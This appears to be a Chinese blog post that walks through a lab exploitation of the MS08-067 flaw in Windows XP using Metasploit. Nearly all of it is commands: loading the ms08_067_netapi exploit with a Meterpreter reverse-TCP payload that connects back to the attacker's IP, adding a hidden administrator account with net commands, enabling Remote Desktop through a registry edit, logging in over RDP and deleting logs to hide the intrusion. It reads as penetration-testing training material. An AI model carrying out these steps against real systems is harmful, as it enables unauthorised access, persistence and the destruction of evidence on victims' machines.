内网渗透笔记(二):MS08-067漏洞利用

前言:
漏洞介绍:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。(出自百度百科)
实验环境:虚拟机
攻击者操作系统:Kali Linux 2019.1
靶机操作系统:Window Xp SP2

一、扫描

  • 使用Nnessus扫描靶机后发现存在MS08-067漏洞:

在这里插入图片描述

二、利用

  • 使用命令:msfdb init初始化msf框架:

在这里插入图片描述

  • 启动数据库:service postgresql start
  • 使用命令:msfconsole,进入metasploit:

在这里插入图片描述

  • 查找漏洞脚本:search ms08-067

在这里插入图片描述

  • 使用漏洞脚本:use exploit/windows/smb/ms08_067_netapi

在这里插入图片描述

  • 设置攻击载荷:set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

  • 查看攻击所需的配置选项:show options

在这里插入图片描述

  • 设置靶机IP:set RHOSTS 192.168.188.123
  • 设置攻击者IP:set LHOST 192.168.188.121

在这里插入图片描述

  • 查看靶机系统类型:show targets

在这里插入图片描述

  • 设置靶机系统类型:set target 10

在这里插入图片描述

  • 攻击: exploit

在这里插入图片描述

三、提权

  • shell

在这里插入图片描述

  • 创建用户:net user test 123 /add

在这里插入图片描述

  • 提权:net localgroup administrators test /add

在这里插入图片描述

  • 删除原来的用户组:net localgroup users test /del

在这里插入图片描述

  • 查看用户: net user test

在这里插入图片描述

四、入侵

  • 在运行中打开:mstsc,远程连接靶机:
    在这里插入图片描述
  • 使用刚刚创建好的用户登录:

在这里插入图片描述

  • 登录成功:

在这里插入图片描述

五、退隐

  • 删除用户

在这里插入图片描述

  • 删除日志:

在这里插入图片描述

溜了,溜了!

PS:若靶机关闭的远程服务则需在shell中执行以下命令:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值